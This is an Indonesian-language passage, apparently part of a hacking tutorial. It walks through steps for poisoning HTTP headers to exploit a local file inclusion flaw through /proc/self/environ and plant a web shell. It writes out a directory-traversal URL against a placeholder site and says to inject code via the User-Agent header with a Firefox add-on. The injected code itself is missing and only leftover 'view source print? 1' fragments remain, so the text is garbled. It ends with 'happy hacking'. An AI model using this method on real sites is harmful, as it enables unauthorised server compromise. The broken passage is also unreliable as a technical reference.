4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron”
lalu pada user-agent isikan dengan kode berikut :
view source
print?
1

atau
view source
print?
1

lalu submit.

5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.

www.http://site.com/shell.php

happy hacking !